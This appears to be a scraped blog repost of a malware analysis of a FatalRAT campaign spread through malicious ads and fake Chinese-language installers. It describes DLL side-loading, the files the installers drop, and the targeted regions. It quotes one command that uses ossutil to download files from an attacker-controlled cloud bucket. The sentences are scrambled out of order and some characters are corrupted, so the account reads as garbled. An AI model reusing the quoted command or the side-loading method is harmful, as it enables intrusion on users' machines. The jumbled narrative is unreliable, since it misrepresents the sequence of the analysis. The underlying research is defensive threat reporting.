![]() ![]() The command executed by the DLL is:Ĭmd /C “C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ –update” The malicious DLL is very simple and executes OSSUTIL (included in the installer package as ssu.exe) to download files from an attacker-controlled bucket in Alibaba Cloud. The malware updater is executed in a similar manner, by side-loading dr.dll, used by a legitimate, signed binary developed by Tencent. Part of the exported functions in the malicious DLL that are forwarded to the original The image shows that the original DLL was renamed to BHuedjhd.dll in this example and that the malicious DLL was compiled as Dll22.dll.įigure 7. Some of the forwarded exports in the malicious DLL are shown in Figure 7. The original libpng13.dll is also included in the installer package (renamed to what appears to be a random name) because the malicious DLL forwards its exported functions to the original DLL. The malware is run by side-loading a malicious DLL, libpng13.dll, which is used by sccs.exe (Browser Support Module), a legitimate executable developed by Xunlei. Create scheduled tasks to execute the loader and updater components.Drop and execute the legitimate installer in C:\Program Files\Common Files (see CommonFiles64Folder).Create an empty directory %PROGRAMDATA%\Progptp (although we observed some cases where the FatalRAT malware was installed in this directory instead).This file contains credentials used by the updater to connect to a remote bucket in the Alibaba Cloud. Drop a file named ossutilconfig in the %USERPROFILE% directory.Drop the malicious updater and related files in the %PROGRAMDATA%\Progtmy\0 directory. ![]() Drop and execute the malicious loader, and files needed to run the FatalRAT malware, in the %PROGRAMDATA%\Progtmy directory.When these installers are executed, they usually: Malicious installers uploaded by the attackers to their cloud storage on January 6 th, 2023 Most of the attacks affected users in Taiwan, China and Hong Kong.įigure 6. None of the malware or network infrastructure used in this campaign has been matched to known activities of any named groups, so for now we have not attributed this activity to any known group.įigure 1 shows a heatmap with the countries where we detected the attacks between August 2022 and January 2023.We observed these attacks between August 2022 and January 2023, but according to our telemetry previous versions of the installers have been used since at least May 2022.We observed victims mostly in Southeast and East Asia, suggesting that the advertisements were targeting that region.The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China. ![]() We reported these ads to Google and they were promptly removed.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |